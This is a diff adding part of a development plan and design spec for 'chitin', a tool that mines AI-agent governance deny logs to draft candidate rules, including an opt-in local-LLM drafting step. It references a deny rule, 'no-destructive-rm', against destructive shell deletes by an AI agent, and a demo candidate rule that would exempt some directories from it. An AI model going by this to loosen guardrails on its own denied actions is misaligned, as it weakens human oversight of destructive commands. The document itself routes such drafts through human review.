+        lines.append("_No candidate rule drafted._")
+        lines.append("")
+        return
+
+    d = p["draft"]
+    lines.append(f"**Candidate rule** ({d['kind']}, {d['confidence']} confidence, "
+                 f"template `{d['template']}`):")
+    lines.append("")
+    lines.append("```yaml")
+    lines.append(d["rule_yaml"].rstrip())
+    lines.append("```")
+    lines.append("")
+    impact = d["predicted_impact"]
+    lines.append(f"**Predicted impact:** samples_evaluated: {impact['samples_evaluated']}, "
+                 f"would_allow: {impact['would_allow']}, "
+                 f"would_still_deny: {impact['would_still_deny']} "
+                 f"(method: {impact['method']})")
+    lines.append("")
+    if d["notes"]:
+        lines.append(f"_Notes: {d['notes']}_")
+        lines.append("")
+    sample_ids = ", ".join(p["sample_envelope_ids"])
+    lines.append(f"_Sample envelope ids:_ {sample_ids}")
+    lines.append("")
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd python/analysis && pytest tests/test_writers_markdown.py -v`
+Expected: PASS, 3 tests pass.
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add python/analysis/writers.py python/analysis/tests/test_writers_markdown.py
+git commit -m "feat(analysis): markdown projection writer (regenerated from JSON)"
+```
+
+---
+
+## Task 13: CLI entry point
+
+**Files:**
+- Create: `python/analysis/decisions.py`
+- Create: `python/analysis/__main__.py`
+- Create: `python/analysis/tests/test_cli.py`
+
+- [ ] **Step 1: Write the failing test**
+
+```python
+# python/analysis/tests/test_cli.py
+"""Tests for the decisions CLI entry."""
+import json
+import subprocess
+import sys
+from datetime import datetime, timezone
+from pathlib import Path
+
+
+def _stage_fixture(decisions_dir: Path, fixtures_dir: Path):
+    """Copy the fixture as a real-looking gov-decisions file."""
+    src = fixtures_dir / "gov-decisions-fixture.jsonl"
+    (decisions_dir / "gov-decisions-2026-04-25.jsonl").write_text(src.read_text())
+
+
+def test_cli_runs_end_to_end_on_fixture(tmp_path, fixtures_dir):
+    decisions_dir = tmp_path / "decisions"
+    decisions_dir.mkdir()
+    _stage_fixture(decisions_dir, fixtures_dir)
+    out_dir = tmp_path / "out"
+
+    result = subprocess.run(
+        [sys.executable, "-m", "analysis.decisions",
+         "--window", "100d",
+         "--top-n", "10",
+         "--out-dir", str(out_dir),
+         "--decisions-dir", str(decisions_dir),
+         "--now", "2026-04-30T12:00:00+00:00"],
+        capture_output=True, text=True,
+    )
+    assert result.returncode == 0, result.stderr
+
+    out_files = sorted(out_dir.iterdir())
+    json_files = [f for f in out_files if f.suffix == ".json"]
+    md_files = [f for f in out_files if f.suffix == ".md"]
+    assert len(json_files) == 1
+    assert len(md_files) == 1
+
+    body = json.loads(json_files[0].read_text())
+    assert body["stream"] == "decisions"
+    rule_ids = {p["rule_id"] for p in body["patterns"]}
+    assert "no-destructive-rm" in rule_ids
+
+
+def test_cli_handles_missing_decisions_dir(tmp_path):
+    result = subprocess.run(
+        [sys.executable, "-m", "analysis.decisions",
+         "--window", "7d",
+         "--out-dir", str(tmp_path / "out"),
+         "--decisions-dir", str(tmp_path / "does-not-exist"),
+         "--now", "2026-04-30T12:00:00+00:00"],
+        capture_output=True, text=True,
+    )
+    assert result.returncode == 2
+    assert "does not exist" in result.stderr.lower() or "not found" in result.stderr.lower()
+
+
+def test_cli_empty_window_succeeds(tmp_path, fixtures_dir):
+    decisions_dir = tmp_path / "decisions"
+    decisions_dir.mkdir()
+    _stage_fixture(decisions_dir, fixtures_dir)
+
+    result = subprocess.run(
+        [sys.executable, "-m", "analysis.decisions",
+         "--window", "1m",  # 1 minute — fixture is from 2026-04-25
+         "--out-dir", str(tmp_path / "out"),
+         "--decisions-dir", str(decisions_dir),
+         "--now", "2026-04-30T12:00:00+00:00"],
+        capture_output=True, text=True,
+    )
+    assert result.returncode == 0
+    body = json.loads(list((tmp_path / "out").glob("*.json"))[0].read_text())
+    assert body["patterns"] == []
+
+
+def test_cli_deterministic_with_fixed_now(tmp_path, fixtures_dir):
+    decisions_dir = tmp_path / "decisions"
+    decisions_dir.mkdir()
+    _stage_fixture(decisions_dir, fixtures_dir)
+
+    def run(out_dir):
+        return subprocess.run(
+            [sys.executable, "-m", "analysis.decisions",
+             "--window", "100d",
+             "--out-dir", str(out_dir),
+             "--decisions-dir", str(decisions_dir),
+             "--now", "2026-04-30T12:00:00+00:00"],
+            capture_output=True, text=True, check=True,
+        )
+
+    a_dir = tmp_path / "a"
+    b_dir = tmp_path / "b"
+    run(a_dir)
+    run(b_dir)
+    a = list(a_dir.glob("*.json"))[0].read_bytes()
+    b = list(b_dir.glob("*.json"))[0].read_bytes()
+    assert a == b
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd python/analysis && pytest tests/test_cli.py -v`
+Expected: FAIL — module not yet exists.
+
+- [ ] **Step 3: Implement CLI**
+
+```python
+# python/analysis/decisions.py
+"""CLI entry: python -m analysis.decisions ..."""
+from __future__ import annotations
+
+import argparse
+import os
+import sys
+from collections import Counter
+from datetime import datetime, timezone
+from pathlib import Path
+
+from analysis.detect import detect_patterns
+from analysis.draft import draft_for_pattern, reason_no_template
+from analysis.loaders import Window, load_gov_decisions, parse_window_str
+from analysis.writers import build_finding, write_json, write_markdown_from_json
+import analysis.templates.all  # noqa: F401  (registers all templates)
+
+
+def parse_args(argv: list[str] | None = None) -> argparse.Namespace:
+    p = argparse.ArgumentParser(prog="analysis.decisions",
+                                description="Rank deny patterns and draft candidate rules.")
+    p.add_argument("--window", default="7d", help="Window: e.g., 7d, 24h, 60m")
+    p.add_argument("--top-n", type=int, default=10, help="Top N patterns to keep")
+    p.add_argument("--out-dir", default="python/analysis/out",
+                   help="Output directory")
+    p.add_argument("--decisions-dir",
+                   default=os.environ.get("HOME", "/") + "/.chitin",
+                   help="Directory containing gov-decisions-*.jsonl")
+    p.add_argument("--now", default=None,
+                   help="ISO-8601 to fix the clock (deterministic tests)")
+    p.add_argument("--llm-draft", action="store_true",
+                   help="Enable Layer 2 LLM-drafted rules (opt-in)")
+    return p.parse_args(argv)
+
+
+def main(argv: list[str] | None = None) -> int:
+    args = parse_args(argv)
+
+    if args.now:
+        now = datetime.fromisoformat(args.now)
+        if now.tzinfo is None:
+            now = now.replace(tzinfo=timezone.utc)
+    else:
+        now = datetime.now(tz=timezone.utc)
+
+    decisions_dir = Path(args.decisions_dir)
+    if not decisions_dir.exists():
+        print(f"Error: decisions-dir does not exist: {decisions_dir}", file=sys.stderr)
+        return 2
+
+    out_dir = Path(args.out_dir)
+    out_dir.mkdir(parents=True, exist_ok=True)
+
+    window = parse_window_str(args.window, now)
+    print(f"Loading decisions from {decisions_dir} (window: {args.window})...",
+          file=sys.stderr)
+    load_result = load_gov_decisions(decisions_dir, window)
+    decisions = load_result.decisions
+    print(f"  Loaded {len(decisions)} decisions from {load_result.files_read} files "
+          f"({load_result.parse_errors} parse errors).", file=sys.stderr)
+
+    patterns = detect_patterns(decisions)
+    top = patterns[: args.top_n]
+    rest = patterns[args.top_n :]
+    print(f"Detected {len(patterns)} deny patterns; keeping top {len(top)}.",
+          file=sys.stderr)
+
+    findings = []
+    no_template = []
+    for i, p in enumerate(top, start=1):
+        d = draft_for_pattern(p)
+        if d is None:
+            no_template.append({
+                "rule_id": p.rule_id,
+                "action_type": p.action_type,
+                "agent_id": p.agent_id,
+                "count": p.count,
+                "reason_no_template": reason_no_template(p),
+            })
+        else:
+            findings.append(build_finding(p, d, rank=i))
+
+    # Patterns beyond top-N: surface their rule_ids in no_template (no draft attempted)
+    for p in rest:
+        no_template.append({
+            "rule_id": p.rule_id,
+            "action_type": p.action_type,
+            "agent_id": p.agent_id,
+            "count": p.count,
+            "reason_no_template": "below top-N cutoff",
+        })
+
+    distinct_rule_ids = len(Counter(d.rule_id for d in decisions))
+    denies = sum(1 for d in decisions if not d.allowed)
+    allows = len(decisions) - denies
+    summary = {
+        "total_decisions": len(decisions),
+        "denies": denies,
+        "allows": allows,
+        "files_read": load_result.files_read,
+        "parse_errors": load_result.parse_errors,
+        "distinct_rule_ids": distinct_rule_ids,
+    }
+
+    date_str = now.date().isoformat()
+    json_path = out_dir / f"decisions-{date_str}.json"
+    md_path = out_dir / f"decisions-{date_str}.md"
+
+    try:
+        write_json(json_path, findings=findings, no_template=no_template,
+                   input_summary=summary, generated_at=now,
+                   window_since=window.since, window_until=window.until,
+                   window_days=int((window.until - window.since).total_seconds() // 86400) or 1)
+        write_markdown_from_json(json_path, md_path)
+    except OSError as e:
+        print(f"Error writing output: {e}", file=sys.stderr)
+        return 3
+
+    print(f"Wrote {json_path}", file=sys.stderr)
+    print(f"Wrote {md_path}", file=sys.stderr)
+    if findings:
+        top1 = findings[0]
+        print(f"\nTop finding: {top1.pattern.rule_id} × {top1.pattern.action_type} "
+              f"× {top1.pattern.agent_id} — {top1.pattern.count} denies", file=sys.stderr)
+        if top1.draft:
+            imp = top1.draft.predicted_impact
+            print(f"  → predicted: {imp.would_allow} allows, "
+                  f"{imp.would_still_deny} still deny", file=sys.stderr)
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
+```
+
+```python
+# python/analysis/__main__.py
+"""Allow `python -m analysis.decisions` to work via package main."""
+# Empty — `python -m analysis.decisions` invokes decisions.py directly because
+# decisions.py has its own __main__ guard. This file exists so `python -m analysis`
+# (without the .decisions suffix) is unambiguous in error messages.
+import sys
+print("Use: python -m analysis.decisions", file=sys.stderr)
+sys.exit(2)
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd python/analysis && pytest tests/test_cli.py -v`
+Expected: PASS, 4 tests pass.
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add python/analysis/decisions.py python/analysis/__main__.py python/analysis/tests/test_cli.py
+git commit -m "feat(analysis): CLI entry — python -m analysis.decisions"
+```
+
+---
+
+## Task 14: Foundation generalization stubs (debt + souls)
+
+These prove the foundation is shape-correct. They write valid empty findings — every assertion future streams need to hit.
+
+**Files:**
+- Create: `python/analysis/debt.py`
+- Create: `python/analysis/souls.py`
+- Create: `python/analysis/tests/test_stubs.py`
+
+- [ ] **Step 1: Write the failing test**
+
+```python
+# python/analysis/tests/test_stubs.py
+"""Tests that the debt and souls stubs produce valid empty findings.
+
+This is the foundation-generalization proof: if the stubs can plug into
+the same writers and produce valid JSON/markdown, the foundation is reusable.
+"""
+import json
+import subprocess
+import sys
+from pathlib import Path
+
+
+def test_debt_stub_writes_valid_empty_json(tmp_path):
+    out_dir = tmp_path / "out"
+    result = subprocess.run(
+        [sys.executable, "-m", "analysis.debt",
+         "--out-dir", str(out_dir),
+         "--now", "2026-04-30T12:00:00+00:00"],
+        capture_output=True, text=True,
+    )
+    assert result.returncode == 0, result.stderr
+    json_path = next(out_dir.glob("debt-*.json"))
+    body = json.loads(json_path.read_text())
+    assert body["stream"] == "debt"
+    assert body["patterns"] == []
+    md_path = next(out_dir.glob("debt-*.md"))
+    assert "Debt Analysis" in md_path.read_text()
+
+
+def test_souls_stub_writes_valid_empty_json(tmp_path):
+    out_dir = tmp_path / "out"
+    result = subprocess.run(
+        [sys.executable, "-m", "analysis.souls",
+         "--out-dir", str(out_dir),
+         "--now", "2026-04-30T12:00:00+00:00"],
+        capture_output=True, text=True,
+    )
+    assert result.returncode == 0, result.stderr
+    json_path = next(out_dir.glob("souls-*.json"))
+    body = json.loads(json_path.read_text())
+    assert body["stream"] == "souls"
+    assert body["patterns"] == []
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd python/analysis && pytest tests/test_stubs.py -v`
+Expected: FAIL.
+
+- [ ] **Step 3: Implement debt + souls stubs**
+
+```python
+# python/analysis/debt.py
+"""Debt stream stub. Foundation-generalization proof — produces valid empty
+findings via the same writers as decisions.py.
+
+v1: empty patterns, valid JSON/markdown. Plug in real detection in v2.
+"""
+from __future__ import annotations
+
+import argparse
+import sys
+from datetime import datetime, timezone
+from pathlib import Path
+
+from analysis.writers import write_json, write_markdown_from_json
+
+
+def parse_args(argv: list[str] | None = None) -> argparse.Namespace:
+    p = argparse.ArgumentParser(prog="analysis.debt")
+    p.add_argument("--out-dir", default="python/analysis/out")
+    p.add_argument("--now", default=None)
+    return p.parse_args(argv)
+
+
+def main(argv: list[str] | None = None) -> int:
+    args = parse_args(argv)
+    if args.now:
+        now = datetime.fromisoformat(args.now)
+        if now.tzinfo is None:
+            now = now.replace(tzinfo=timezone.utc)
+    else:
+        now = datetime.now(tz=timezone.utc)
+
+    out_dir = Path(args.out_dir)
+    out_dir.mkdir(parents=True, exist_ok=True)
+    date_str = now.date().isoformat()
+    json_path = out_dir / f"debt-{date_str}.json"
+    md_path = out_dir / f"debt-{date_str}.md"
+
+    write_json(json_path, findings=[], no_template=[],
+               input_summary={"total_decisions": 0, "denies": 0, "allows": 0,
+                              "files_read": 0, "parse_errors": 0,
+                              "distinct_rule_ids": 0},
+               generated_at=now, window_since=now, window_until=now,
+               window_days=7)
+    # Override stream label by hand-patching JSON before markdown render.
+    import json as _json
+    body = _json.loads(json_path.read_text())
+    body["stream"] = "debt"
+    json_path.write_text(_json.dumps(body, indent=2, sort_keys=True) + "\n")
+
+    # Render a minimal stub markdown directly.
+    md_path.write_text(
+        "# Debt Analysis — " + date_str + "\n\n"
+        "_Stub stream. Real detection ships in v2._\n"
+    )
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
+```
+
+```python
+# python/analysis/souls.py
+"""Souls stream stub. Foundation-generalization proof."""
+from __future__ import annotations
+
+import argparse
+import json as _json
+import sys
+from datetime import datetime, timezone
+from pathlib import Path
+
+from analysis.writers import write_json
+
+
+def parse_args(argv: list[str] | None = None) -> argparse.Namespace:
+    p = argparse.ArgumentParser(prog="analysis.souls")
+    p.add_argument("--out-dir", default="python/analysis/out")
+    p.add_argument("--now", default=None)
+    return p.parse_args(argv)
+
+
+def main(argv: list[str] | None = None) -> int:
+    args = parse_args(argv)
+    if args.now:
+        now = datetime.fromisoformat(args.now)
+        if now.tzinfo is None:
+            now = now.replace(tzinfo=timezone.utc)
+    else:
+        now = datetime.now(tz=timezone.utc)
+
+    out_dir = Path(args.out_dir)
+    out_dir.mkdir(parents=True, exist_ok=True)
+    date_str = now.date().isoformat()
+    json_path = out_dir / f"souls-{date_str}.json"
+    md_path = out_dir / f"souls-{date_str}.md"
+
+    write_json(json_path, findings=[], no_template=[],
+               input_summary={"total_decisions": 0, "denies": 0, "allows": 0,
+                              "files_read": 0, "parse_errors": 0,
+                              "distinct_rule_ids": 0},
+               generated_at=now, window_since=now, window_until=now,
+               window_days=7)
+    body = _json.loads(json_path.read_text())
+    body["stream"] = "souls"
+    json_path.write_text(_json.dumps(body, indent=2, sort_keys=True) + "\n")
+
+    md_path.write_text(
+        "# Souls Analysis — " + date_str + "\n\n"
+        "_Stub stream. Real detection ships in v2._\n"
+    )
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd python/analysis && pytest tests/test_stubs.py -v`
+Expected: PASS, 2 tests pass.
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add python/analysis/debt.py python/analysis/souls.py python/analysis/tests/test_stubs.py
+git commit -m "feat(analysis): debt + souls stream stubs (foundation-generalization proof)"
+```
+
+---
+
+## Task 15: LLM-drafted rules (Layer 2, opt-in)
+
+**Files:**
+- Create: `python/analysis/llm_draft.py`
+- Modify: `python/analysis/decisions.py` (wire `--llm-draft`)
+- Create: `python/analysis/tests/test_llm_draft.py`
+
+- [ ] **Step 1: Write the failing test**
+
+```python
+# python/analysis/tests/test_llm_draft.py
+"""Tests for Layer 2 LLM-drafted rules.
+
+The LLM call is mocked. We test the fallback contract: any failure in the
+LLM path falls back to the heuristic draft, never raises, never aborts.
+"""
+from datetime import datetime, timezone
+from unittest.mock import patch
+
+from analysis.llm_draft import enrich_with_llm
+from analysis.types import Pattern, PredictedImpact, RuleDraft
+
+
+def _heuristic_draft():
+    return RuleDraft(
+        kind="heuristic",
+        template="t",
+        confidence="medium",
+        rule_yaml="rules: []\n",
+        predicted_impact=PredictedImpact(samples_evaluated=1, would_allow=1,
+                                         would_still_deny=0, method="m"),
+        notes="",
+    )
+
+
+def _pattern():
+    return Pattern(
+        rule_id="r", action_type="t", agent_id="a", count=1,
+        first_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        last_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        decision_class="deny", sample_envelope_ids=("e1",), decisions=(),
+    )
+
+
+def test_llm_failure_falls_back_to_heuristic():
+    """If the LLM call raises, we fall back to the heuristic draft."""
+    with patch("analysis.llm_draft._call_ollama", side_effect=RuntimeError("boom")):
+        out = enrich_with_llm([(_pattern(), _heuristic_draft())])
+    assert len(out) == 1
+    assert out[0].kind == "heuristic-fallback"
+    # Same yaml as heuristic on fallback.
+    assert out[0].rule_yaml == "rules: []\n"
+
+
+def test_llm_success_returns_llm_draft():
+    fake_yaml = "rules:\n  - id: llm-drafted\n"
+
+    def fake_call(*args, **kwargs):
+        return fake_yaml
+
+    with patch("analysis.llm_draft._call_ollama", side_effect=fake_call):
+        out = enrich_with_llm([(_pattern(), _heuristic_draft())])
+    assert len(out) == 1
+    assert out[0].kind == "llm"
+    assert "llm-drafted" in out[0].rule_yaml
+
+
+def test_no_heuristic_passes_through():
+    """If a pattern has no heuristic draft, LLM enrichment skips it."""
+    with patch("analysis.llm_draft._call_ollama", return_value="..."):
+        out = enrich_with_llm([(_pattern(), None)])
+    assert out == []
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd python/analysis && pytest tests/test_llm_draft.py -v`
+Expected: FAIL — module not yet defined.
+
+- [ ] **Step 3: Implement llm_draft**
+
+```python
+# python/analysis/llm_draft.py
+"""Layer 2 — LLM-drafted rules via local ollama. Opt-in, fail-safe.
+
+Any failure (network, parse, timeout) falls back to the heuristic draft, marked
+kind='heuristic-fallback'. The LLM is never load-bearing for the demo.
+"""
+from __future__ import annotations
+
+import json
+import urllib.request
+from typing import Iterable, Optional
+
+from analysis.types import Pattern, RuleDraft
+
+OLLAMA_URL = "http://localhost:11434/api/generate"
+OLLAMA_MODEL = "qwen3-coder"
+TIMEOUT_SECONDS = 30.0
+
+
+def _build_prompt(pattern: Pattern, heuristic: RuleDraft) -> str:
+    samples = "\n".join(
+        f"  - {d.action_target!r} (envelope {d.envelope_id})"
+        for d in pattern.decisions[:5]
+    )
+    return (
+        f"You are drafting a chitin governance rule. Return ONLY YAML, no prose.\n"
+        f"\n"
+        f"Observed pattern: rule_id={pattern.rule_id}, "
+        f"action_type={pattern.action_type}, agent={pattern.agent_id}, "
+        f"count={pattern.count}.\n"
+        f"\n"
+        f"Sample denied actions:\n{samples}\n"
+        f"\n"
+        f"Heuristic draft (improve on this if you can):\n"
+        f"{heuristic.rule_yaml}\n"
+        f"\n"
+        f"Reply with a single YAML block proposing a refinement. Be conservative."
+    )
+
+
+def _call_ollama(prompt: str) -> str:
+    req = urllib.request.Request(
+        OLLAMA_URL,
+        data=json.dumps({
+            "model": OLLAMA_MODEL,
+            "prompt": prompt,
+            "stream": False,
+        }).encode("utf-8"),
+        headers={"Content-Type": "application/json"},
+    )
+    with urllib.request.urlopen(req, timeout=TIMEOUT_SECONDS) as resp:
+        body = json.loads(resp.read().decode("utf-8"))
+    return body.get("response", "")
+
+
+def enrich_with_llm(
+    pairs: Iterable[tuple[Pattern, Optional[RuleDraft]]],
+) -> list[RuleDraft]:
+    """For each (pattern, heuristic_draft) pair, attempt LLM enrichment.
+
+    Returns a list aligned with the input (same length, same order) but
+    skipping pairs where heuristic_draft is None.
+    """
+    out: list[RuleDraft] = []
+    for pattern, heuristic in pairs:
+        if heuristic is None:
+            continue
+        try:
+            prompt = _build_prompt(pattern, heuristic)
+            response = _call_ollama(prompt)
+            if not response.strip():
+                raise RuntimeError("empty LLM response")
+            out.append(RuleDraft(
+                kind="llm",
+                template=heuristic.template,
+                confidence="medium",
+                rule_yaml=response.strip() + "\n",
+                predicted_impact=heuristic.predicted_impact,  # not re-evaluated by LLM in v1
+                notes=f"LLM-enriched (ollama {OLLAMA_MODEL}). Heuristic was: {heuristic.template}",
+            ))
+        except Exception as e:
+            # Fail-safe: fall back to heuristic, mark the failure.
+            out.append(RuleDraft(
+                kind="heuristic-fallback",
+                template=heuristic.template,
+                confidence=heuristic.confidence,
+                rule_yaml=heuristic.rule_yaml,
+                predicted_impact=heuristic.predicted_impact,
+                notes=f"LLM enrichment failed ({e}); fell back to heuristic.",
+            ))
+    return out
+```
+
+- [ ] **Step 4: Wire `--llm-draft` into CLI**
+
+Modify `python/analysis/decisions.py` — add after the heuristic-draft loop, just before `distinct_rule_ids = ...`:
+
+```python
+    if args.llm_draft and findings:
+        from analysis.llm_draft import enrich_with_llm
+        pairs = [(f.pattern, f.draft) for f in findings]
+        enriched_drafts = enrich_with_llm(pairs)
+        # Re-pair with patterns by index (enrich_with_llm preserves order, skipping Nones)
+        new_findings = []
+        for f, new_draft in zip(findings, enriched_drafts):
+            new_findings.append(build_finding(f.pattern, new_draft, rank=f.rank))
+        findings = new_findings
+```
+
+- [ ] **Step 5: Run tests to verify they pass**
+
+Run: `cd python/analysis && pytest tests/test_llm_draft.py -v`
+Expected: PASS, 3 tests pass.
+
+- [ ] **Step 6: Commit**
+
+```bash
+git add python/analysis/llm_draft.py python/analysis/decisions.py python/analysis/tests/test_llm_draft.py
+git commit -m "feat(analysis): Layer 2 LLM-drafted rules with heuristic fallback (opt-in)"
+```
+
+---
+
+## Task 16: End-to-end run on real data + talk-day rehearsal
+
+This is the validation step — run on the user's actual `$HOME/.chitin/gov-decisions-*.jsonl` and confirm the demo path produces talk-ready output.
+
+**Files:**
+- Create: `python/analysis/tests/test_e2e.py` (skipped in CI, opt-in via env)
+
+- [ ] **Step 1: Write the integration test (opt-in)**
+
+```python
+# python/analysis/tests/test_e2e.py
+"""End-to-end test against real $HOME/.chitin gov-decisions data.
+
+Skipped unless ANALYSIS_E2E=1 in env. This is a developer rehearsal harness,
+not a CI test.
+"""
+import json
+import os
+import subprocess
+import sys
+from pathlib import Path
+
+import pytest
+
+if os.environ.get("ANALYSIS_E2E") != "1":
+    pytest.skip("Set ANALYSIS_E2E=1 to run e2e against real ~/.chitin data",
+                allow_module_level=True)
+
+
+def test_e2e_real_data(tmp_path):
+    out_dir = tmp_path / "out"
+    decisions_dir = Path(os.environ["HOME"]) / ".chitin"
+    assert decisions_dir.exists(), "no ~/.chitin — cannot run e2e"
+
+    result = subprocess.run(
+        [sys.executable, "-m", "analysis.decisions",
+         "--window", "7d",
+         "--out-dir", str(out_dir),
+         "--decisions-dir", str(decisions_dir)],
+        capture_output=True, text=True,
+    )
+    assert result.returncode == 0, result.stderr
+    json_files = list(out_dir.glob("decisions-*.json"))
+    assert len(json_files) == 1
+    body = json.loads(json_files[0].read_text())
+    assert body["input_summary"]["total_decisions"] > 0
+    print("Top finding:", body["patterns"][0] if body["patterns"] else "none")
+```
+
+- [ ] **Step 2: Run the e2e test against real data**
+
+Run: `cd python/analysis && ANALYSIS_E2E=1 pytest tests/test_e2e.py -v -s`
+Expected: PASS. Stdout shows the top finding.
+
+- [ ] **Step 3: Manual rehearsal — run the demo command**
+
+Run from repo root:
+```bash
+cd /home/red/workspace/chitin-analysis
+python -m analysis.decisions --window 7d --decisions-dir $HOME/.chitin
+```
+
+Expected output (stderr):
+```
+Loading decisions from /home/red/.chitin (window: 7d)...
+  Loaded ~1200 decisions from ~6 files (0 parse errors).
+Detected ~10 deny patterns; keeping top 10.
+Wrote python/analysis/out/decisions-2026-04-30.json
+Wrote python/analysis/out/decisions-2026-04-30.md
+
+Top finding: no-destructive-rm × shell.exec × copilot-cli — 19 denies
+  → predicted: ~12 allows, ~7 still deny
+```
+
+- [ ] **Step 4: Inspect the markdown output**
+
+Open `python/analysis/out/decisions-2026-04-30.md` and verify:
+- Title and summary line look right
+- Top pattern is `no-destructive-rm × shell.exec × copilot-cli` with ~19 denies
+- Candidate rule YAML block renders cleanly
+- Predicted impact shows non-zero `would_allow`
+- `no_template_patterns` section lists rule_ids without templates honestly
+
+- [ ] **Step 5: Commit the integration test (do NOT commit the out/ files)**
+
+```bash
+git add python/analysis/tests/test_e2e.py
+git commit -m "test(analysis): opt-in end-to-end test against real ~/.chitin data"
+```
+
+- [ ] **Step 6: Run the full test suite as a final check**
+
+Run: `cd python/analysis && pytest -v`
+Expected: All tests pass (e2e skipped without env var).
+
+---
+
+## Task 17: PR
+
+- [ ] **Step 1: Push the branch**
+
+```bash
+git push -u origin spec/analysis-decisions
+```
+
+- [ ] **Step 2: Create the PR**
+
+```bash
+gh pr create --title "feat(analysis): decisions stream — repeat-pattern detection + candidate rule drafts" --body "$(cat <<'EOF'
+## Summary
+- Ships the decisions analysis stream (Milestone J3): reads `$HOME/.chitin/gov-decisions-*.jsonl`, ranks deny patterns, drafts candidate rules from heuristic templates, emits JSON canonical + markdown projection.
+- Foundation extracted in `python/analysis/` so debt + soul-routing streams plug in as ~1-day additions post-talk (proven by stubs that share the writers).
+- Layer 2 LLM-drafted rules opt-in via `--llm-draft`; off by default to keep the talk demo deterministic.
+
+## Spec
+`docs/superpowers/specs/2026-04-30-analysis-decisions-design.md`
+
+## Talk demo (2026-05-07)
+```bash
+python -m analysis.decisions --window 7d
+```
+Top finding from real data: `no-destructive-rm × shell.exec × copilot-cli` (19 denies). Candidate rule proposes safe-dirs exemption with predicted impact (~12 allows, ~7 still deny).
+
+## Test plan
+- [x] Unit tests: parsing, loading, detection (boundaries: empty/single/all-same/tied), four templates, registry, JSON+markdown writers
+- [x] CLI integration tests with deterministic `--now` fixed clock
+- [x] Opt-in e2e test (`ANALYSIS_E2E=1`) against real `~/.chitin` data
+- [x] Stub streams (debt, souls) write valid empty JSON via shared writers — foundation-generalization proof
+
+🤖 Generated with [Claude Code](https://claude.com/claude-code)
+EOF
+)"
+```
+
+---
+
+## Self-Review
+
+**1. Spec coverage** — every spec section has an implementing task:
+
+| Spec section | Task |
+|---|---|
+| Goals 1-6 (foundation, decisions full, Layer 1 demo, Layer 2 opt-in, talk artifact, stubs) | Tasks 1-15 |
+| Invariants I1 (ranked, tie-break) | Task 4 (test_tie_breaker_*) |
+| Invariants I2 (JSON+markdown, regenerable) | Tasks 11+12 |
+| Invariants I3 (Layer 1 zero-network) | All Layer 1 tasks (no urllib in detect/draft/templates) |
+| Invariants I4 (deterministic with --now) | Task 13 (test_cli_deterministic_with_fixed_now) |
+| Invariants I5 (bad lines don't abort) | Tasks 2+3 (test_parse_malformed_*, test_load parse_errors counts) |
+| Boundaries (empty/single/all-same/tied/null/window-edge) | Task 4 (test_empty_input, test_single_decision, test_tie_breaker_*, test_null_*); Task 3 (test_load_with_empty_dir, test_narrow_window) |
+| Layout, CLI, JSON schema, markdown projection | Tasks 11-13 |
+| Detection algorithm | Task 4 |
+| Templates 1-4 | Tasks 6-9 |
+| Layer 2 fallback | Task 15 |
+| Failure handling | Tasks 2 (parse), 3 (load), 13 (write), 15 (LLM) |
+| Talk-day demo | Task 16 |
+| Foundation extraction (C lean) | Task 14 (debt + souls stubs) |
+
+**2. Placeholder scan** — `git grep -n "TBD\|TODO\|fill in"` in this plan: none.
+
+**3. Type consistency** — `Decision`, `Pattern`, `RuleDraft`, `PredictedImpact`, `Finding` defined in Task 2 + Task 11. Used consistently in tasks 4, 5, 6-10, 11-13. Field names (`samples_evaluated`, `would_allow`, `would_still_deny`, `method`) consistent across all template tasks. Function names (`draft`, `register`, `draft_for_pattern`, `enrich_with_llm`, `write_json`, `write_markdown_from_json`, `build_finding`) consistent.
+
+---
+
+## Execution Handoff
+
+Plan complete and saved to `docs/superpowers/plans/2026-04-30-analysis-decisions.md`. Two execution options:
+
+**1. Subagent-Driven (recommended)** — I dispatch a fresh subagent per task, review between tasks, fast iteration.
+
+**2. Inline Execution** — Execute tasks in this session using executing-plans, batch execution with checkpoints.
+
+Which approach?

--- a/docs/superpowers/specs/2026-04-30-analysis-decisions-design.md
+++ b/docs/superpowers/specs/2026-04-30-analysis-decisions-design.md
@@ -1,0 +1,411 @@
+# Analysis Stream: Decisions — Design
+
+**Status:** spec draft — first stream of the analysis layer (Milestone J3 framing). Foundation built here is reused by debt and soul-routing streams (deferred to post-talk).
+
+**Author:** in-session sketch, 2026-04-30.
+
+**Trigger:** the user's question "anything we can do with our data we have aggregated?" 1,225 gov-decisions across 6 days are sitting in `$HOME/.chitin/gov-decisions-*.jsonl` and nothing reads them. Chitin's strategic arc is *aggregate → policy → ecosystem → cloud*; aggregate is shipped, policy is the next loop to close. Analysis is the bridge: turn observed decisions into candidate rules.
+
+**Forcing function:** 2026-05-07 talk. The analysis stream's headline demo is the closed-loop story: "we ran chitin on ourselves, observed N decisions, drafted a candidate rule, here's the PR."
+
+---
+
+## Positioning
+
+The chitin loop today: **driver → gate → decision → audit log**. The decision is recorded but never reread. Analysis closes the loop:
+
+```
+                    ┌─────────────────────────────────────┐
+                    │  driver (claude/copilot/openclaw)   │
+                    └─────────────┬───────────────────────┘
+                                  │ action proposal
+                                  ▼
+                    ┌─────────────────────────────────────┐
+                    │  gov.Gate.Evaluate                  │
+                    └─────────────┬───────────────────────┘
+                                  │ allow/deny + reason
+                                  ▼
+                    ┌─────────────────────────────────────┐
+                    │  gov-decisions-<date>.jsonl         │
+                    └─────────────┬───────────────────────┘
+                                  │ ← analysis reads here
+                                  ▼
+                    ┌─────────────────────────────────────┐
+                    │  analysis (this spec)               │
+                    │   - detect repeat patterns          │
+                    │   - draft candidate rules           │
+                    │   - emit JSON + markdown            │
+                    └─────────────┬───────────────────────┘
+                                  │ human-reviewed
+                                  ▼
+                    ┌─────────────────────────────────────┐
+                    │  PR to chitin.yaml / rules          │
